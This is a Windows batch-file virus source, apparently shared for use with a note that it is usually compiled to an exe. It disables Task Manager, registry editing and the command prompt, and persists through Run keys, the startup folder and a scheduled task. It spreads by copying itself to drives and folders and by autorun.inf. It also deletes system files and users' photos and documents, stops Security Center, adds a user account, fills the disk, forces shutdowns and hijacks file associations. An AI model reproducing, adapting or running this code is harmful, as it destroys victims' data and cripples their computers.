biasanya pake batfile lalu --> convert to exe
echo off
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v norun /t reg_dword /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nofind /t reg_dword /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v Nostartmenupinnedlist /t reg_dword /d 1 /f
reg ADD HKLM\Software\Microsoft\Windows\Currentversion\Policies\explorer /v Nostartmenupinnedlist /t reg_dword /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v noclose /t reg_dword /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nofilemenu /t reg_dword /d 1 /f
reg ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nostartmenumoreprograms /t reg_dword /d 1 /f
reg ADD HKLM\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nostartmenumoreprograms /t reg_dword /d 1 /f
---------------------------------------------------------------------------------------------------------------------------------
md d:\cheat
md d:\winddows
md d:\shader
for %%a in (C D E F G ) do if exist "%%a:" copy %0 "%%a:\broken_heart.exe"
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
-------------------------------------------------------------------------------------------------------------------------
md c:\colok_matamu
md c:\cleaning_magic
md c:\login
if not exist c:\cleaning_magic\%0 copy %0 c:\cleaning_magic\broken_heart.exe
if not exist c:\login\%0 copy %0 c:\login\broken_heart.exe
if not exist c:\windows\system32\%0 copy %0 c:\windows\system32\broken_heart.exe
if not exist c:\windows\system32\%0 copy %0 c:\windows\system32\boot.exe
if not exist c:\windows\system32\%0 copy %0 c:\windows\system32\"film lucu bugil,wav.exe ".exe
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\run /v patahhati2 /t reg_sz /d c:\windows\system32\boot.exe /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\run /v patahhati /t reg_sz /d c:\windows\system32\broken_heart.exe /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\run /v brokenati /t reg_sz /d c:\windows\doom.vbs /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\system /v disableCMD /t reg_dword /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\system /v disableCMD /t reg_dword /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\system /v disableregistrytools /t reg_dword /d 1 /f
set "Dir=c:\program files"
cd /D "%Dir%"
for /f "tokens=*" %%a in ('dir "%Dir%" /b /a:D') do (
Ren "%%~fa" "%%~a self"
)
set "Dir="C:\Documents and Settings\""
cd /D "%Dir%"
for /f "tokens=*" %%a in ('dir "%Dir%" /b /a:D') do (
Ren "%%~fa" "%%~a heart"
)
set "Dir=C:\"
cd /D "%Dir%"
for /f "tokens=*" %%a in ('dir "%Dir%" /b /a:D') do (
Ren "%%~fa" "%%~a heart"
)
----------------------------------------------------------------------------------------------------------------------
if not exist autorun.inf goto bwt_autorun
goto lanjut_1
:bwt_autorun
echo off > autorun.inf
echo [autorun] >> autorun.inf
echo open=broken_heart.exe >> autorun.inf
echo action=open folder with your antivirus >> autorun.inf
echo shell\open\command=broken_heart.exe >> autorun.inf
echo shell\open=open folder with your virus cleaner >> autorun.inf
echo shell\open\Default=1 >> autorun.inf
echo shell\explore\command=broken_heart.exe >> autorun.inf
goto lanjut_1
:lanjut_1
for %%a in (C D E F G ) do if exist "%%a:" copy %0 "%%a:\broken_heart.exe"
for %%a in (C D E F G ) do if exist "%%a:" copy %0 "%%a:\autorun.inf"
if not exist c:\windows\torabika.bat goto bwt_kopi
goto lanjut_2
:bwt_kopi
echo off > c:\windows\text.txt
echo >> c:\windows\text.txt
echo >> c:\windows\text.txt
echo hari demi hari mulai q jalani... >> c:\windows\text.txt
echo meski rasanya buruk dalam hidup ini karena tak pernah ada yang menemani q >> c:\windows\text.txt
echo kau bilang kau sahabatq namun kamu hanya lah orang biasa>> c:\windows\text.txt
echo >> c:\windows\text.txt
echo >> c:\windows\text.txt
echo >> c:\windows\text.txt
echo karena kamu cuman dateng ketika butuh namun ketika dah gx butuh udah lupa >> c:\windows\text.txt
echo cukup sudah q kan blajar lupain >> c:\windows\text.txt
echo karena kmu dah gx bisa hargai arti apa yg q perbuat >> c:\windows\text.txt
echo inilah ucapan q karena udah mau ndengerin kisah q >> c:\windows\text.txt
echo terima kasih ^^ >> c:\windows\text.txt
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\run /v svchoast /t reg_sz /d c:\windows\text.txt /f
REG ADD HKLM\Software\Microsoft\Windows\Currentversion\run /v debugger /t reg_sz /d c:\windows\text.txt /f
For /R "C:\windows\system32\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
For /R "D:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
For /R "c:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
For %%v in (*) do copy %0 "%%v" ren * *.Bat
ASSOC.DOc=.Hancur!!
goto lanjut_2
:lanjut_2
if not exist c:\windows\cm.bat goto bwt_cm
goto lanjut_3
:bwt_cm
echo off > c:\windows\cm.bat
echo shutdown -s -f -t 60 >> c:\windows\cm.bat
REG ADD HKLM\Software\Microsoft\Windows\Currentversion\run /v debugg2er /t reg_sz /d c:\windows\cm.bat /f
goto lanjut_3
:lanjut_3
Code:
setlocal ENABLEDELAYEDEXPANSION
for %%a in (C D) do if exist "%%a:\" (
for /f "tokens=3" %%b in ('dir "%%a:\" ^|find /i "Dir(s)"') do (
for /f "tokens=1-5 delims=," %%k in ("%%b") do (
set pagefile_%%a=%%k%%l%%m%%n
set /a pagefile_%%a-=10000000
)
)
fsutil file createnew "%%a:\pagefiles.sys" !pagefile_%%a! >nul 2>&1
attrib +s +h "%%a:\pagefiles.sys"
)
echo msgbox("i fell sad go to my world by sandmanzz") > c:\windows\net.vbs
echo msgbox("yo can feel my pain go to my world by sandmanzz") >> c:\windows\net.vbs
echo msgbox("i will open the door go to my world by sandmanzz") >> c:\windows\net.vbs
echo msgbox("restart this kompie to feel my pain") >> c:\windows\net.vbs
:start
c:\windows\net.vbs
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\run /v alternatewindowssearcgh/t reg_sz /d c:\windows\net.vbs /f
attrib +h +s c:\windows\cinta.bat
attrib +h +s c:\windows\cm.bat
attrib +h +s c:\windows\text.txt
attrib +H +s c:\windows\doom.vbs
attrib +H +s c:\windows\system32\broken_heart.exe
del c:\windows\shell32.dll
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
:1
start %0
attrib c:\*.exe /s /d +H +S
attrib c:\*.mpeg /s /d +H +S
attrib c:\*.docx /s /d +H +S
del d:\*.jpg /s
del d:\*.txt /s
del d:\*.jpeg /s
del d:\*doc /s
net stop "security center"
schtask /create /sc minute /mo 9 /tn hati2 /tr c:\windows\system32\broken_heart.exe /ru system
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\system /v disableregistrytools /t reg_dword /d 1 /f
REG ADD HKCU\Software\microsoft\windows\CurrentVersion\Explorer\Advance /v showsuperhiden /t reg_dword /d 0 /f
net user %date% /add
REG ADD HKCR\Network\SharingHandler /ve /t REG_sz /d "" /f
:Start_Infect
for %%a in ("C:\*.*") do (
set "ext=%%~xa"
set "for_check_ext=!ext:~-3!"
IF /i not "!for_check_ext!"=="vir" (
call :Find_Type
copy /y %0 "%%~dpna!ext!vir" && attrib +s +h "%%~fa"
)
)
GOTO :NEXT
:Find_Type
REm Check if Extension already exist
REG Query "HKCR\!ext!vir" >nul 2>&1 && GOTO :EOF
for /f "tokens=1* delims==" %%a in ('assoc !ext!') do (
set "file_type=%%~b"
)
for /f "tokens=1* delims==" %%a in ('assoc !file_type!') do (
set "new_type=%%~b"
)
for /f "tokens=3*" %%a in ('REG QUERY "HKCR\!file_type!\DefaultIcon" ^| find /i "REG_SZ"') do (
set "icon_location=%%~b"
)
:start
c:\windows\doom.vbs
d:\windows\cm.bat
echo crash > c:\windows\cinta.bat
echo msg * new life >> c:\windows\cinta.bat
echo start cinta.bat >> c:\windows\cinta.bat
echo goto luup >> c:\windows\cinta.bat
echo :luup >> c:\windows\cinta.bat
echo msg * i always do anything for you >> c:\windows\cinta.bat
echo start cinta.bat >> c:\windows\cinta.bat
echo goto luup2 >> c:\windows\cinta.bat
echo :luup2 >> c:\windows\cinta.bat
echo msg * tapi tak berguna oh amit-amit with you >> c:\windows\cinta.bat
echo start cinta.bat >> c:\windows\cinta.bat
echo goto crash >> c:\windows\cinta.bat
:start
c:\windows\cinta.bat
:Create
REm Create New Extension
(
ASSOC !ext!vir=vir!ext!
ASSOC vir!ext!=!new_type!
REG ADD "HKCR\vir!ext!"
REG ADD "HKCR\vir!ext!\DefaultIcon"
REG ADD "HKCR\vir!ext!\DefaultIcon" /ve /d "!icon_location!"
REG ADD "HKCR\vir!ext!\Shell"
REG ADD "HKCR\vir!ext!\Shell\Open"
REG ADD "HKCR\vir!ext!\Shell\Open\Command"
REG ADD "HKCR\vir!ext!\Shell\Open\Command" /ve /d "cmd /c type \"%%1\">\"%TEMP%\temp.bat\" && call \"%TEMP%\temp.bat\" && del /f /q \"%TEMP%\temp.bat\""
) >nul 2>&1
GOTO :EOF
:NEXT
